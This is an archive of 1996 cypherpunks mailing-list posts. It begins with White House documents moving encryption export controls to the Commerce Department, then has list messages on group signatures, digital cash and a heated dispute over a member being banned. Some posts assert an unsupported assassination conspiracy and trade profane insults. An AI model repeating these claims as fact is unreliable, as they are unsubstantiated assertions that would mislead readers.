  harm national security and foreign policy interests of the
  United States even where comparable products are or appear to
  be available from foreign sources.  Accordingly, the new order
  makes clear that any EAA provision dealing with issuance of
  licenses or removal of controls based on foreign availability
  considerations shall not apply with respect to export controls
  on such encryption products.  Notwithstanding this, the
  Secretary of Commerce retains the discretion to consider the
  foreign availability of comparable encryption products in any
  particular case.

                                Sincerely,


                                WILLIAM J. CLINTON


                               #  #  #

                           THE WHITE HOUSE

                    Office of the Press Secretary

  _______________________________________________________________

  For Immediate Release                         November 15, 1996



                          November 15, 1996



  MEMORANDUM FOR THE VICE PRESIDENT
                 THE SECRETARY OF STATE
                 THE SECRETARY OF THE TREASURY
                 THE SECRETARY OF DEFENSE
                 THE ATTORNEY GENERAL
                 THE SECRETARY OF COMMERCE
                 UNITED STATES TRADE REPRESENTATIVE
                 DIRECTOR OF THE OFFICE OF MANAGEMENT AND BUDGET
                 CHIEF OF STAFF TO THE PRESIDENT
                 DIRECTOR OF CENTRAL INTELLIGENCE
                 DIRECTOR, FEDERAL BUREAU OF INVESTIGATION
                 DIRECTOR, NATIONAL SECURITY AGENCY
                 ASSISTANT TO THE PRESIDENT FOR NATIONAL
                    SECURITY AFFAIRS
                 ASSISTANT TO THE PRESIDENT FOR ECONOMIC POLICY
                 ASSISTANT TO THE PRESIDENT FOR SCIENCE AND
                    TECHNOLOGY POLICY

  SUBJECT:       Encryption Export Policy


  Encryption products, when used outside the United States, can
  jeopardize our foreign policy and national security interests.
  Moreover, such products, when used by international criminal
  organizations, can threaten the safety of U.S. citizens here
  and abroad, as well as the safety of the citizens of other
  countries.  The exportation of encryption products accordingly
  must be controlled to further U.S. foreign policy objectives,
  and promote our national security, including the protection of
  the safety of U.S. citizens abroad.  Nonetheless, because of
  the increasingly widespread use of encryption products for the
  legitimate protection of the privacy of data and communications
  in nonmilitary contexts; because of the importance to U.S.
  economic interests of the market for encryption products;
  and because, pursuant to the terms set forth in the Executive
  order entitled Administration of Export Controls on Encryption
  Products (the "new Executive order") of November 15, 1996,
  Commerce Department controls of the export of such dual-use
  encryption products can be accomplished without compromising
  U.S. foreign policy objectives and national security interests,
  I have determined at this time not to continue to designate such
  encryption products as defense articles on the United States
  Munitions List.

  Accordingly, under the powers vested in me by the Constitution
  and the laws of the United States, I direct that:

  1.  Encryption products that presently are or would be
  designated in Category XIII of the United States Munitions
  List and regulated by the Department of State pursuant to
  the Arms Export Control Act (22 U.S.C. 2778 et seq.) shall
  be transferred to the Commerce Control List, and regulated
  by the Department of Commerce under the authority conferred

                                 more

                                                    (OVER)

                                  2

  in Executive Order 12924 of August 19, 1994 (as continued on
  August 15, 1995, and August 14, 1996), Executive Order 12981
  of December 5, 1995, and the new Executive order except
  that encryption products specifically designed, developed,
  configured, adapted, or modified for military applications
  (including command, control, and intelligence applications),
  shall continue to be designated as defense articles, shall
  remain on the United States Munitions List, and shall continue
  to be controlled under the Arms Export Control Act.  The
  transfer described in this paragraph shall be effective upon
  the issuance of final regulations (the "Final Regulations")
  implementing the safeguards specified in this directive and
  in the new Executive order.

  2.  The Final Regulations shall specify that the encryption
  products specified in section 1 of this memorandum shall be
  placed on the Commerce Control List administered by the
  Department of Commerce.  The Department of Commerce shall,
  to the extent permitted by law, administer the export of such
  encryption products, including encryption software, pursuant
  to the requirements of sections 5 and 6 of the former Export
  Administration Act (50 U.S.C. App. 2405 and 2406), and the
  regulations thereunder, as continued in effect by Executive
  Order 12924 of August 19, 1994 (continued on August 15, 1995,
  and on August 14, 1996), except as otherwise indicated in or
  modified by the new Executive order, Executive Order 12981 of
  December 5, 1995, and any Executive orders and laws cited
  therein.

  3.  The Final Regulations shall provide that encryption
  products described in section 1 of this memorandum can be
  licensed for export only if the requirements of the controls
  of both sections 5 and 6 of the former Export Administration
  Act (50 U.S.C. App. 2405 and 2406), and the regulations
  thereunder, as modified by the new Executive order, Executive
  Order 12981 of December 5, 1995, and any Executive orders
  and laws cited therein, are satisfied.  Consistent with
  section 742.1(f) of the current Export Administration
  Regulations, the Final Regulations shall ensure that a license
  for such a product will be issued only if an application can
  be and is approved under both section 5 and section 6.  The
  controls on such products will apply to all destinations.
  Except for those products transferred to the Commerce Control
  List prior to the effective date of the Final Regulations,
  exports and reexports of encryption products shall initially be
  subject to case-by-case review to ensure that export thereof
  would be consistent with U.S. foreign policy objectives and
  national security interests, including the safety of U.S.
  citizens.  Consideration shall be given to more liberalized
  licensing treatment of each such individual product after
  interagency review is completed.  The Final Regulations shall
  also effectuate all other specific objectives and directives set
  forth in this directive.

  4.  Because encryption source code can easily and mechanically
  be transformed into object code, and because export of such
  source code is controlled because of the code's functional
  capacity, rather than because of any "information" such code
  might convey, the Final Regulations shall specify that
  encryption source code shall be treated as an encryption
  product, and not as technical data or technology, for export
  licensing purposes.

  5.  All provisions in the Final Regulations regarding
  "de minimis" domestic content of items shall not apply with
  respect to the encryption products described in paragraph 1
  of this memorandum.

                                 more

                                  3

  6.  The Final Regulations shall, in a manner consistent with
  section 16(5)(C) of the EAA, 50 U.S.C. App. 2415(5)(C), provide
  that it will constitute an export of encryption source code
  or object code software for a person to make such software
  available for transfer outside the United States, over radio,
  electromagnetic, photooptical, or photoelectric communications
  facilities accessible to persons outside the United States,
  including transfer from electronic bulletin boards and Internet
  file transfer protocol sites, unless the party making the
  software available takes precautions adequate to prevent the
  unauthorized transfer of such code outside the United States.

  7.  Until the Final Regulations are issued, the Department of
  State shall continue to have authority to administer the export
  of encryption products described in section 1 of this memorandum
  as defense articles designated in Category XIII of the United
  States Munitions List, pursuant to the Arms Export Control Act.

  8.  Upon enactment of any legislation reauthorizing the
  administration of export controls, the Secretary of Defense,
  the Secretary of State, and the Attorney General shall reexamine
  whether adequate controls on encryption products can be
  maintained under the provisions of the new statute and advise
  the Secretary of Commerce of their conclusions as well as any
  recommendations for action.  If adequate controls on encryption
  products cannot be maintained under a new statute, then such
  products shall, where consistent with law, be designated or
  redesignated as defense articles under 22 U.S.C. 2778(a)(1),
  to be placed on the United States Munitions List and controlled
  pursuant to the terms of the Arms Export Control Act and the
  International Traffic in Arms Regulations.  Any disputes
  regarding the decision to designate or redesignate shall be
  resolved by the President.



                                     WILLIAM J. CLINTON



                                # # #

                           THE WHITE HOUSE

                    Office of the Press Secretary

  _______________________________________________________________

  For Immediate Release                         November 15, 1996


                           EXECUTIVE ORDER

                            - - - - - - -

       ADMINISTRATION OF EXPORT CONTROLS ON ENCRYPTION PRODUCTS


       By the authority vested in me as President by the
  Constitution and the laws of the United States of America,
  including but not limited to the International Emergency
  Economic Powers Act (50 U.S.C. 1701 et seq.), and in order to
  take additional steps with respect to the national emergency
  described and declared in Executive Order 12924 of August 19,
  1994, and continued on August 15, 1995, and on August 14, 1996,
  I, WILLIAM J. CLINTON, President of the United States of
  America, have decided that the provisions set forth below shall
  apply to administration of the export control system maintained
  by the Export Administration Regulations, 15 CFR Part 730
  et seq. ("the EAR").  Accordingly, it is hereby ordered as
  follows:

       Section 1.  Treatment of Encryption Products.  In order
  to provide for appropriate controls on the export and foreign
  dissemination of encryption products, export controls of
  encryption products that are or would be, on this date,
  designated as defense articles in Category XIII of the
  United States Munitions List and regulated by the United States
  Department of State pursuant to the Arms Export Control Act,
  22 U.S.C. 2778 et seq. ("the AECA"), but that subsequently are
  placed on the Commerce Control List in the EAR, shall be subject
  to the following conditions:  (a)  I have determined that the
  export of encryption products described in this section could
  harm national security and foreign policy interests even where
  comparable products are or appear to be available from sources
  outside the United States, and that facts and questions
  concerning the foreign availability of such encryption products
  cannot be made subject to public disclosure or judicial review
  without revealing or implicating classified information that
  could harm United States national security and foreign policy
  interests.  Accordingly, sections 4(c) and 6(h)(2)-(4) of
  the Export Administration Act of 1979 ("the EAA"), 50 U.S.C.
  App. 2403(c) and 2405(h)(2)-(4), as amended and as continued
  in effect by Executive Order 12924 of August 19, 1994, and
  by notices of August 15, 1995, and August 14, 1996, all
  other analogous provisions of the EAA relating to foreign
  availability, and the regulations in the EAR relating to such
  EAA provisions, shall not be applicable with respect to export
  controls on such encryption products.  Notwithstanding this,
  the Secretary of Commerce ("Secretary") may, in his discretion,
  consider the foreign availability of comparable encryption
  products in determining whether to issue a license in a
  particular case or to remove controls on particular products,
  but is not required to issue licenses in particular cases or
  to remove controls on particular products based on such
  consideration;

       (b)  Executive Order 12981, as amended by Executive
  Order 13020 of October 12, 1996, is further amended as follows:

       (1)  A new section 6 is added to read as follows:
  "Sec. 6.  Encryption Products.  In conducting the license
  review described in section 1 above, with respect to export
  controls of encryption products that are or would be, on
  November 15, 1996, designated as defense articles in Category


                                 more

                                                    (OVER)

                                  2

  XIII of the United States Munitions List and regulated by the
  United States Department of State pursuant to the Arms Export
  Control Act, 22 U.S.C. 2778 et seq., but that subsequently are
  placed on the Commerce Control List in the Export Administration
  Regulations, the Departments of State, Defense, Energy, and
  Justice and the Arms Control and Disarmament Agency shall have
  the opportunity to review any export license application
  submitted to the Department of Commerce.  The Department of
  Justice shall, with respect to such encryption products, be a
  voting member of the Export Administration Review Board
  described in section 5(a)(1) of this order and of the Advisory
  Committee on Export Policy described in section 5(a)(2) of this
  order.  The Department of Justice shall be a full member of the
  Operating Committee of the ACEP described in section 5(a)(3) of
  this order, and of any other committees and consultation groups
  reviewing export controls with respect to such encryption
  products."

       (2)  Sections 6 and 7 of Executive Order 12981 of
  December 5, 1995, are renumbered as new sections 7 and 8,
  respectively.

       (c)  Because the export of encryption software, like the
  export of other encryption products described in this section,
  must be controlled because of such software's functional
  capacity, rather than because of any possible informational
  value of such software, such software shall not be considered
  or treated as "technology," as that term is defined in
  section 16 of the EAA (50 U.S.C. App. 2415) and in the EAR
  (61 Fed. Reg. 12714, March 25, 1996);

       (d)  With respect to encryption products described in this
  section, the Secretary shall take such actions, including the
  promulgation of rules, regulations, and amendments thereto, as
  may be necessary to control the export of assistance (including
  training) to foreign persons in the same manner and to the same
  extent as the export of such assistance is controlled under the
  AECA, as amended by section 151 of Public Law 104-164;

       (e)  Appropriate controls on the export and foreign
  dissemination of encryption products described in this section
  may include, but are not limited to, measures that promote the
  use of strong encryption products and the development of a key
  recovery management infrastructure; and

       (f)  Regulation of encryption products described in this
  section shall be subject to such further conditions as the
  President may direct.

       Sec. 2.  Effective Date.  The provisions described in
  section 1 shall take effect as soon as any encryption products
  described in section 1 are placed on the Commerce Control List
  in the EAR.

       Sec. 3.  Judicial Review.  This order is intended only to
  improve the internal management of the executive branch and to
  ensure the implementation of appropriate controls on the export
  and foreign dissemination of encryption products.  It is not
  intended to, and does not, create any rights to administrative
  or judicial review, or any other right or benefit or trust
  responsibility, substantive or procedural, enforceable
  by a party against the United States, its agencies or
  instrumentalities, its officers or employees, or any other
  person.



                                WILLIAM J. CLINTON

  THE WHITE HOUSE,
      November 15, 1996.


-----BEGIN PGP SIGNATURE-----BY SAFEMAIL-----
Version: 1.0b4 e22

iQCVAwUBMo3yMW23+ciinrc5AQGThQQAwBOZ9AV6IB+0lp2VHs6h+AAkb/XOiTsj
PpzXuD7TwWItvNErM1nV1f7KP5X7uzhLdAwZZVdBeOrKzzqm2WtvMCFBBjrStpDp
M71ckQTU+CPsACj55VVN5Vo4puMheiiWVodYQbr0RvV8L/u/3+89K6HL21zK4lmk
znvyInZUJKo=
=IFje
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Sat, 16 Nov 1996 10:46:36 -0800 (PST)
To: paul@fatmons.demon.co.uk
Subject: Re: Members of Parliament Problem
Message-ID: <199611161725.JAA01334@crypt.hfinney.com>
MIME-Version: 1.0
Content-Type: text/plain


From: paul@fatmans.demon.co.uk
> You could also have an arbitrated blind signature protocol whereby 
> trent shares a keypair with all users. bob encrypts his comment, M 
> with the key he shares with trent. On recieving it trent carries out 
> a blind signature on it and publishes it, as trent knows only bob has 
> the shared key, K he knows bob said M but as it is a blind sigature 
> and he is likely to be signing a lot of messages (trent is of course 
> a computer program) he doesn`t know which message came from bob.

I don't quite follow how this would work.  If Trent issues a blind
signature, then that means (doesn't it?) that he doesn't see what he
is signing.  So how can he confirm that the message is actually from
a member of the group when he doesn't see it?

> Also Chaums group signatures could be used but unfortunately the 
> arbitrator can find out who said what, but does not normally know.
> Also trent can forge digital signatures with this protocol.
> Chaum further mentions protocols for this sort of thing that do not 
> even need an arbitrator but I don`t have the papers on this.

Not all of Chaum's proposals in the original paper from Eurocrypt 91
have this property.  Here is what he has, somewhat simplified.  Z is
the trusted party for those protocols which use one.

1) Each group member makes up a key which he will use for one signature.
Z signs each key to certify that it is a member of the group.  People
don't re-use keys so that messages are unlinkable.  Z can tell who sent
which message since he knows the keys.

2) Z publishes an RSA modulus N, gives each group member a secret exponent
si, and publishes v = the product of all the si.  Members sign message m
by producing m**si mod N.  Then to confirm the signature they engage in a
zero knowledge protocol to prove that the signature is of the proper form
and that si divides v (without revealing si).  Chaum gives a protocol for
this.

3) Z again publishes an RSA modulus N, and each group member chooses his
own RSA modulus Ni = pi * qi.  To sign message m he produces m**pi mod N.
He then proves in zero knowledge that the signature is of the proper
form and that pi divides the product of all the Ni (without revealing pi).
This is the same zero knowledge protocol as in (2) above.

4) Members agree on a large public prime p with generator g.  Each member
chooses a secret exponent si with public key ki = g**si mod p.  (This is a
standard discrete log cryptosystem setup.)  To sign message m he produces
m**si mod p.  He must then prove in zero knowledge that the signature
is of the proper form and that si is the private exponent corresponding
to the public key of some group member, without revealing exactly which
group member it is for.  The protocol for this is not very efficient.
It uses a cut and choose concept and has to be iterated multiple times.

In methods 1, 2, and 3, Z can tell who made a signature.  In method
2, Z can forge signatures for other members.  Method 4 doesn't use
a trusted party.

Method number 4 is very similar to Chaum's original proposal for
undeniable signatures, although the zero knowledge proof is very different
since he doesn't want to reveal which particular key his exponent
corresponds to.

In the Eurocrypt 94 paper by Chen and Pederson they show a very nice
protocol for proving that you know the exponent corresponding to
one of a set of Diffie Hellman public keys.  This is similar to the
problem in (4) above.  Given k1=g**s1, k2=g**s2, ..., you can prove
that you know one of the si without revealing which one.  The protocol
is pretty simple and just requires one challenge and response, although
the amount of data sent is proportional to the number of ki in the set.

This could be used to prove group membership anonymously.  If there
were a list published of public keys of people on the cypherpunks list,
you could prove you were on that list without revealing your identity.
I think it could be made a signature protocol by having the challenge
c depend on a hash of the message.  But the authors don't do it that
way, they do a more complicated protocol because they are seeking to
achieve unconditional rather than cryptographic anonymity.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: L0rD gEcK0 <geck0@ilps.com>
Date: Sat, 16 Nov 1996 09:36:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: -=/HaCk, InC.\=-
Message-ID: <9611161737.AA07343@geocities.com>
MIME-Version: 1.0
Content-Type: text/plain


join #hackinc or #hackteach on efnet and join the group, run by:
L0rD gEcK0
HaRdC0Re
^TWiSTeR^
Painter
Catgrrl
larsk
One Day... The world will be overcome by gEcK0's, and if you havent been
kind to me,
you WILL be sorry!!! ;)

***£Ø(r)ÐgË(c)KØ***





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Sat, 16 Nov 1996 10:48:22 -0800 (PST)
To: reece@taz.nceye.net
Subject: Re: Remailer Abuse Solutions
Message-ID: <199611161742.JAA01346@crypt.hfinney.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Bryan Reece <reece@taz.nceye.net>
> But what about Okamoto and Ohta's digital cash scheme published in
> Crypto '91?  It appears to be fully untraceable and transferable.  Of
> course, I haven't heard of anyone trying to use this scheme (has it
> been broken?)

This digital cash scheme has a big disadvantage which the authors try
to play down.  The problem is that all spending by a particular user is
linkable.  It can't be connected to his True Name but all of it is
linked, in effect, to his nym.  This is bad because it allows profiling
and dossiers to be built up about nyms with interesting spending patterns,
which could then be used to identify which ones should be candidates
for intensive efforts to discover their identity.

Most other digital cash schemes don't allow linkability of the payor's
activities, which is a much better approach.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 16 Nov 1996 10:47:14 -0800 (PST)
To: Peter Hendrickson <ph@netcom.com>
Subject: Re: [POLITICS] Re: Members of Parliament Problem
In-Reply-To: <v02140b02aeb30446063a@[192.0.2.1]>
Message-ID: <328DFD9B.31E6@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Peter Hendrickson wrote:
> At 11:31 PM 11/15/1996, Adam Shostack wrote:
> >        So, if 'anonymous Senator' came out for legalization, it would
> > be declared that it was Kennedy, source of all Liberal Evil.  Good
> > policy comes from leaders standing up and leading.  Since they don't,
> > I'm a crypto-anarchist.  To try and help the Congress become more
> > effective is not in anyones interest, except that class of person who
> > makes their living off the workings of government.
> >         There are lots of variations on the argument that politics is
> > from the greek poly, meaning many, and ticks, a small bloodsucking
> > animal.  My interest in creating new, consensual realities is that I
> > don't want to be forced to care about the congress.

> I may have misunderstood you, but when you suggested "disallowing"
> Congressmen to use anonymity, it did not sound consensual.  Even
> blood sucking parasites should be allowed to benefit from cryptoanarchy.
> I for one, would be most interested in what Congressmen would have
> to say if they knew their words could in no way be traced back to
> them.  I suspect that there are a lot of basketcases in Congress
> and that this would become clear from the horrible things they would
> have to say when they were sure nobody was looking.

Go back to circa 1974-1976, and the Hart-Schweiker (spelling?) report.
Gary Hart telling about the things he saw in the intelligence reports,
etc., and how scary they were.  Fast-forward to Hart's outing in his
Presidential bid, and that confirms what happens when they can't say
things publicly.

I'm only quoting (minimally) one instance here - there are *tons* of
such admissions on the part of high-ranking people, but they're mostly
forgotten due to the avalanche of disinformation dumped on the people
by the big media every day.

Interesting how many people in the U.S., from the very top on down, know
quite a bit of the conspiracy to murder the Kennedys and Dr. King, but
some of the "intellectuals" on this very list can't handle the reality
of that, so they pretend it never happened.  Or, as Laugh-In said back
in the late 1960's, "In a few years, it'll be 'what assassination?'".






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 16 Nov 1996 10:45:34 -0800 (PST)
To: Rich Graves <rcgraves@ix.netcom.com>
Subject: Re: Could Declan or some libertarian explain this?
In-Reply-To: <Pine.GUL.3.95.961114200538.29970B-100000@Networking.Stanford.EDU>
Message-ID: <328DFEAD.41C@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves wrote:
> >From the so-called fight-censorship list. I would ask there, but the list
> owner won't let me, and I won't stoop to Vulis's level.
> |        PLEASE MARK MY WORDS: IF MY BOOK IS NOT RE-PUBLISHED AND AVAILABLE
> |IN BOOKSTORES, THE CAUSE OF ACADEMIC FREEDOM IN THE WEST WILL BE IN A SORRY
> |STATE.  FEW ACADEMICS WOULD BE PREPARED TO SUFFER THE MANY BLOWS AND
> |THREATS THAT I HAVE NOW ENDURED FOR SIX MONTHS. IF 'The 'g' Factor'
> |DISAPPEARS, SO WILL OTHER SERIOUS PRODUCTS OF RESEARCH AND SCHOLARSHIP --
> |ESPECIALLY IF THEY ARE DEEMED "CONTROVERSIAL" BY THE LIBERAL-LEFT.

> His complaint is that his publisher stopped distribution of his book arguing
> that blacks are mentally inferior to whites.
> Could someone please explain to me how Chris Brand is different from Vulis?
> I mean in form; in practice, Declan is bashing Vulis for not recognizing
> rights of private editorial control, but uncritically passing on Mr. Brand's
> message alleging that private editorial control is censorship. Far be it
> from me to criticize Declan's right to exercise editorial control over
> substantive dissent and factual correction, but I was just wondering.

Could someone explain to me why we have to have *any* censorship, if
people on a list are given tools to filter with and reminded on occasion
how to use them?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L-Soft list server at CCI (1.8b)" <LISTSERV@MAIL.COMPCURR.COM>
Date: Sat, 16 Nov 1996 08:57:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: Output of your job "cypherpunks"
Message-ID: <199611161756.JAA00016@mail.compcurr.com>
MIME-Version: 1.0
Content-Type: text/plain


> ok
Confirming:
> SIGNOFF NEWSLETTER
You have been removed from the NEWSLETTER list.

Summary of resource utilization
-------------------------------
 CPU time:        0.200 sec                Device I/O:        0
 Overhead CPU:    0.000 sec                Paging I/O:        0
 CPU model:         Pentium 90/100 (30M)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Sat, 16 Nov 1996 08:01:23 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: THAT is what makes John Gilmore an ASSHOLE!
In-Reply-To: <Pine.LNX.3.95.961115073500.2693I-100000@dhp.com>
Message-ID: <328DE511.28E5@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn wrote:
> 
> Mike McNally wrote:
> 
> > (So what if John decided simply to pull the plug on toad in order to
> > plug in a new hot tub?)
> 
> Well, what if he did?  Are you sure that would make aga look like a 
> fool,

No, and it's not clear to me why you think my question had anything to
do with my wanting "aga" to look like a fool.  That was not my intent.
I simply question the claim by "aga" that somehow Mr. Gilmore is 
obligated to provide his services and capital to support the "public
property" that the cypherpunks list has allegedly become, as opposed
to treating it like the ephemeral by-product of software running on a
computer he owns.


> or would it make you look like a fool, since it would tend to confirm
> what people like aga have been saying?

I presume that you and aga already think I'm a fool, or worse, but
I don't trouble myself with understanding the fancies of inscrutable 
intellects.

______c_________________________________________________________________
Mike M Nally * IBM % Tivoli * Austin TX  * How quickly we forget that
mailto:m5@tivoli.com mailto:m101@io.com  * "deer processing" and "data
http://www.io.com/~m101/                 * processing" are different!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Sat, 16 Nov 1996 10:01:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Does John Gilmore...
Message-ID: <3.0.32.19961116100146.0074095c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:37 AM 11/16/96 -0800, Sandy Sandfort <sandfort@crl.com> wrote:

[snip]
>I have a suggestion for "Aga" and others who believe this sort of
>nonsense.  Please do us all a favor and try to sue John.  I'm sure 
>that among all jack-leg and wannabe lawyers on this list that they
>can come up with a viable cause of action.  And John has deep 
>pockets; you could (literally) make out like bandits AND rescue 
>"freedom of speech" on privately maintained mailing lists. 

Such a case would obviously fail.  John has the right to ban anyone he
wants from a list that he is hosting.

I do question, though, whether or not it was the best way to handle the
situation.  As I have argued, the availability of end-user filtering made
banning Dimitri from the list unnecessary, IMHO.  And the list owner giving
people the boot sure doesn't fit with the picture I have had of what
cypherpunks was about.  YMMV.

I think that John is doing a lot of great things for crypto (his
participation in the Bernstein case, S/WAN, etc.) and I agree with at least
90% of the things I see him doing.  I think he made the wrong call with
Dimitri, though.

>You 
>could be heroes (or look ten times as foolish as you already do).

Actually, if John was trying to cut down on the noise by banning the Kook,
I think it's backfired.  It seems like there is even more irrational
chatter now...


Rich

--
Rich Burroughs
richieb@teleport.com
http://www.teleport.com/~richieb/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 16 Nov 1996 10:47:31 -0800 (PST)
To: Tim Scanlon <tfs@adsl-122.cais.com>
Subject: Re: Censor John Gilmore -- EFF is a disgrace!
In-Reply-To: <9611161024.AA00954@adsl-122.cais.com>
Message-ID: <328E032B.40D7@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Tim Scanlon wrote:
> Stephen Boursy wrote, along with a horde of others with no lives:
> [lots of worthless crap snipped out]
> > None of that analogy is applicable to the cyberpunks list.
> > When a list gets as big as that, it it no longer to be considered
> > a "mailing-list" but it is a _public_ forum.  The whole problem
> > here is the abuse of power by both the EFF and John Gilmore.

> It's not an abuse of power. It was an effort to curtail inappropriate
> SPAM. Much like this entire topic has become non-crypto SPAM on the
> cypherpunks list.

[snippo]

> Oh, and it's spelled "internet", and when use inside a sentance, it isn't
> capitolized, no matter what Bill tells you.

Tim is criticizing whom?
Tim, it's spelled "sentence", with an "e".
Tim, it's spelled "capitalized", with an "a".

> And if you pulled the plug
> on any of your 6 lists, the members would have the option of reforming
> another list someplace else, but it would be YOUR OPTION to pull the
> plug, unless you were "only" the adminstrator, and not the list "owner".
> John owns the list in the classic sense. (Ok I realize I may have lost
> you there Mr. "InterNet", but the way it works is that either organizations
> or individuals own lists, in this case it's an individual.)

Speaking of "classis sense", this is yet another bunch of drivel which
says nothing but implies that ownership of the machinery allows the
"owner" to exercise rights over the messages and the messagers.

> All bullshit aside, this whole thing has NOTHING to do with crypto.
> And it has very VERY little to do with censorship either. And it's
> gotten way, way out of hand. I suggest that it might be better not
> to spam cypherpunks with this stuff, and to give it a rest.

Do you talk to yourself a lot, bud?  Why should anyone give a damn what
you think about whether they are on-topic or not, or what they choose to
do with their time? Why don't you go read up on some of these things and
contribute something useful instead?

BTW, I think appropriately is spelled with an "e".






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 16 Nov 1996 10:45:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: A New Crypto Announcement--Could be Ominous
In-Reply-To: <v03007803aeb2869761df@[207.167.93.63]>
Message-ID: <328E0496.2C7C@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> (My traffic from the Cypherpunks list comes in bursts interspersed by long
> gaps, so I don't know if this has been reported. It seems significant to me.)
> A few excerpts:
> H-P ( Hewlett-Packard Co ) says RSA Data ( Security Dynamics Technologies
> Inc ) in codes deal
> PALO ALTO, Calif., Nov 15 (Reuter) - Hewlett-Packard Co. said Security
> Dynamics Technologies Inc's RSA Data Security Inc electronic encryption
> company is involved in its planned announcement Monday of new advance in
> encryption technology.
> Hewlett-Packard said technology the company's Chairman and Chief Executive
> Lewis Platt is due to detail at the National Press Club on Monday aims
> to resolve this roadblock in the use of electronic commerce over the Internet.
>    ^^^^^^^^^^^^^^^^^^^^^^[emphasis added by Tim]
> Hewlett-Packard officials declined to give precise details, but said the
> technology has already received backing from the U.S. government and other
>            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> governments which it did not name, as well as major industry players.
> Senior executives of Microsoft Corp and Intel Corp are among those
> scheduled to make presentations on Monday, Hewlett-Packard said, but it
> declined to identify other companies whose technologies will be involved.
> It sounds ominous to me. Another backroom deal, probably for some form of
> key recovery strategy, aka GAK.

In my dealings with Platt's office, I discovered an interesting thing.
His staffers are retired people, who have no mailboxes at HP, and who
you reach only through a single individual, kinda like the concept of
compartmentalization used in military operations.

And believe me, that isn't the only peculiar thing going on there.

Let's just say that HP is a shrewd survivor in a sea of nasty predators.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George A. Stathis" <hyperlex@hol.gr>
Date: Sat, 16 Nov 1996 00:27:17 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: THAT is what makes (ANY) "John" an ASSHOLE!
Message-ID: <199611161225.KAA11219@prometheus.hol.gr>
MIME-Version: 1.0
Content-Type: text/plain


Flames? What flames?  Hm...

I'm neither a fireman, nor a... pyromaniac! :-)

******************************************************************
Gradually, I came to the conclusion that "Flame wars" rage-on
because of INTOLERANCE.  Typically, they develop at a "meta-level"
to the flames _themselves_, and escalate when people start talking
about "getting offended" and that kind of shit, aiming at CONTROL.
******************************************************************



At 08:00 ðì 15/11/1996 -0500, aga wrote:

>This whole thing boils down to John Gilmore not liking
>"rants" or "personal attacks."  What does that chicken-shit
                                 **************************
>punk hide behind in real life?  When his terminal is not
 ********************************************************
>protecting him?
 ***************
  ^^^
VERY IMPORTANT ($1000-) QUESTION HERE!
( I've often wondered myself... )

i.e. (the wider issue) HOW does cowardice manage to *fake* power?

Well, having lived outside my country for about 15 years, at first
I tried to blame... some nationalities (such as the English) for
possessing the cowardice which is the root of the problem.
(-NOT true, in fact. Being "reserved" is not always "cowardly").

Then I blamed the... gullible Americans; then my... "buzuki-minded"
Greek compatriots (those who've never been outside their villages).
(BTW a "buzuki" is a fuckin-awful Greek/Turkish musical instrument
 I can't stand, which puts me in the minority over here)... :-)

However, it's a deeper and wider problem than such narrow "national"
explanations. Boils down to _personal_ growth, maturity, tolerance,
and the ability to respond in a "tit-for-tat" basis, rather than a
"look mummy what they've done to me" mentality-basis (TM/worldwide).

Another way of looking at it is this: DO NOT carry guns when going
to the... saloon (or to the Internet discussion)... :-)
( A list-owner's _only_ gun is "forcible unsubcription". )


Tit-for-Tat is simple enough, and does NOT always imply escalation;
e.g. If someone calls me an asshole, I _also_ call the guy an
asshole. It doesn't have to continue... Then (and only then)
_if_ he and I calm down, we MIGHT buy each other drinks!

The Anglo-Saxon way of Politeness and the Greek way of Expressiveness
are not incompatible, BTW: Oscar Wilde said that "A gentleman is a man
who knows _when_ to be rude".

Of course, gentlemen ALSO make mistakes. (AND admit them, bravely;
in direct contrast to the view that "a man admits no mistake").

But if you called me an asshole, and I REFRAINED from answering back,
becoming friends again would be indeed humiliating: THIS is the Greek
way, as I understand it; Insults can be *CATHARTIC*. Censoring insults
is HIDEOUS, HOSTILE, and DANGEROUS. I can forgive ANY insult, but NOT
an act of censorship. Either we speak as equals, or else we kill each
other. And censorship is like _spiritual_ MURDER, philosophically.

I also never understood why an insult offends the "insultee"; Is not
"hurt" an indication that the "offensive" attributions are TRUE?

Some of my English friends never understood why the Greeks burst
out in laughter with some of the most horrifying insults... :-)



>John Gilmore is connected with the corrupt
>cabal boys anyway, so he should be dismissed as anybody having
>any credibility any more.
>
>"Once you pull the first plug, you are forever more a whore,"
  **********************************************************
>as the greeks would say.

A ha ha! :-)
Indeed (and it rhymes!)

Minor Correction: (Once pulling a plug) one is a pimp, not a whore.
